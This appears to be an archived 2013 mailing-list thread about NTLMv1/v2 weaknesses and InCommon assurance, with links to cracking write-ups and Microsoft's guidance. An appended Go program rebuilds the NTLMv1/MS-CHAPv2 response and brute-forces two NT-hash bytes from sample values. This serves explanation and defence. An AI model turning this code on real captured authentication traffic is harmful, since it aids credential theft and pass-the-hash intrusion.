
Subject: Meeting the InCommon Assurance profile criteria using Active Directory

[AD-Assurance] RE: Sorry for the NTLMv1/v2 confusion

  • From: "Capehart,Jeffrey D" <>
  • To: "" <>
  • Subject: [AD-Assurance] RE: Sorry for the NTLMv1/v2 confusion
  • Date: Fri, 21 Jun 2013 18:53:16 +0000

Here’s a blog I found about extracting the hash and then going on to brute-forcing the plaintext password from NTLM challenge response.  I also included Microsoft’s guidance on NTLMv1 and LM.  –Jeff C.

NTLM Challenge Response is 100% Broken (Yes, this is still relevant)

http://markgamache.blogspot.com/2013/01/ntlm-challenge-response-is-100-broken.html

How to use Cloudcracker to brute-force out hashes.  MS-CHAPv2 uses the EXACT same math as the LM and NTLM challenge response.  Moxie demonstrates how one can submit the challenge and response to Cloudcracker to get back the LM or NTLM hash.

Security guidance for NTLMv1 and LM network authentication

http://support.microsoft.com/kb/2793313

To reduce the risk of this issue, we recommend that you configure environments that run Windows NT 4, Windows 2000, Windows XP, and Windows Server 2003 to allow the use of NTLMv2 only. To do this, manually set the LAN Manager Authentication Level to 3 or higher as described here.

From: [mailto:] On Behalf Of Ron Thielen
Sent: Friday, June 21, 2013 1:14 PM
To:
Subject: [AD-Assurance] Sorry for the NTLMv1/v2 confusion

I apologize for nearly derailing the conversation.  While I still maintain that hash-stealing attacks against NTLMv2 are irrelevant to Silver assertion if you can't use the hash to authenticate to a service that compromises the actual password (e.g. as long as Shib isn't using Windows authentication), the piece I confused was that NTLMv1 does actually pass the password.  So, a brute-force attack on v1 does get you the actual password, not just a hash collision.

This just reinforces my conviction that the world would be a much better place without Windows.  If only IBM had chosen CP/M instead of MS-DOS back in the day.  :-)

Ron
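The "exact same math" point in Jeff's message, worked through as an added example (this code is written for this archive page; it is not from the Gamache or Moxie posts, from Cloudcracker, or from anyone on the list). It builds the LM/NTLMv1/MS-CHAPv2 response from a hash and an 8-byte challenge with Go's standard crypto/des, derives the MS-CHAPv2 challenge with crypto/sha1 as RFC 2759 does, and then recovers the last two bytes of the hash from a single challenge/response pair by brute force. The 16-byte NT hash, the challenge values and the user name "jdoe" are all constructed sample values; the MD4-over-UTF-16LE step that turns a password into an NT hash is left out, so the sample hash corresponds to no real password.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// expandDESKey turns a 7-byte (56-bit) key fragment into the 8-byte form
// crypto/des expects: seven key bits per byte with the low bit left for
// parity. DES ignores the parity bit, so the fragment alone fixes the key.
func expandDESKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0] & 0xFE
	k8[1] = (k7[0]<<7 | k7[1]>>1) & 0xFE
	k8[2] = (k7[1]<<6 | k7[2]>>2) & 0xFE
	k8[3] = (k7[2]<<5 | k7[3]>>3) & 0xFE
	k8[4] = (k7[3]<<4 | k7[4]>>4) & 0xFE
	k8[5] = (k7[4]<<3 | k7[5]>>5) & 0xFE
	k8[6] = (k7[5]<<2 | k7[6]>>6) & 0xFE
	k8[7] = (k7[6] << 1) & 0xFE
	return k8
}

// desBlock encrypts one 8-byte block under a 7-byte key fragment.
func desBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(expandDESKey(k7))
	if err != nil {
		panic(err) // only reachable with a wrongly sized key
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ChallengeResponse is the construction shared by LM, NTLMv1 and MS-CHAPv2:
// pad the 16-byte hash to 21 bytes with zeros, split it into three 7-byte
// DES keys, and encrypt the same 8-byte challenge under each one.
func ChallengeResponse(hash16, challenge8 []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, hash16)
	resp := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(padded[i:i+7], challenge8)...)
	}
	return resp
}

// MSCHAPv2Challenge derives the 8-byte challenge MS-CHAPv2 feeds into the
// construction above (RFC 2759 ChallengeHash): SHA-1 over the peer
// challenge, the authenticator challenge and the user name, truncated.
func MSCHAPv2Challenge(peerChallenge, authChallenge []byte, username string) []byte {
	h := sha1.New()
	h.Write(peerChallenge)
	h.Write(authChallenge)
	h.Write([]byte(username))
	return h.Sum(nil)[:8]
}

// RecoverK3 shows why the construction is broken: the third DES key holds
// only hash bytes 14 and 15 plus five known zero bytes, so an attacker with
// one challenge/response pair recovers those two bytes in at most 65536
// DES operations. The other two keys are independent 56-bit searches,
// which is the work a Cloudcracker-style service does on dedicated hardware.
func RecoverK3(challenge8, response24 []byte) ([]byte, bool) {
	target := response24[16:24]
	k7 := make([]byte, 7)
	for guess := 0; guess < 1<<16; guess++ {
		k7[0], k7[1] = byte(guess>>8), byte(guess)
		if bytes.Equal(desBlock(k7, challenge8), target) {
			return []byte{k7[0], k7[1]}, true
		}
	}
	return nil, false
}

func main() {
	// Constructed sample values. A real NT hash is MD4(UTF-16LE(password));
	// this one is an arbitrary 16-byte value not derived from any password.
	ntHash, _ := hex.DecodeString("0123456789abcdeffedcba9876543210")
	serverChallenge, _ := hex.DecodeString("1122334455667788")

	resp := ChallengeResponse(ntHash, serverChallenge)
	fmt.Printf("NTLMv1 response:       %x\n", resp)

	tail, ok := RecoverK3(serverChallenge, resp)
	fmt.Printf("hash bytes 14..15:     %x (recovered=%v)\n", tail, ok)

	// Same hash, same math, different transport: MS-CHAPv2 only changes
	// where the 8-byte challenge comes from.
	peer, _ := hex.DecodeString("0000000000000000aaaaaaaaaaaaaaaa")
	auth, _ := hex.DecodeString("ffffffffffffffff1111111111111111")
	mschap := ChallengeResponse(ntHash, MSCHAPv2Challenge(peer, auth, "jdoe"))
	fmt.Printf("MS-CHAPv2 NT-Response: %x\n", mschap)
}
```

Running it prints the 24-byte responses and the two hash bytes pulled back out of the third block within 65536 DES calls; the remaining 14 bytes are the two 2^56 searches the blogs above describe, and once the full hash is known it is usable directly wherever NTLM is accepted, before any password cracking. Nothing here depends on a weak password, which is why the KB article's remedy is to refuse LM and NTLMv1 outright (LAN Manager Authentication Level 3 or higher) rather than to strengthen passwords.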
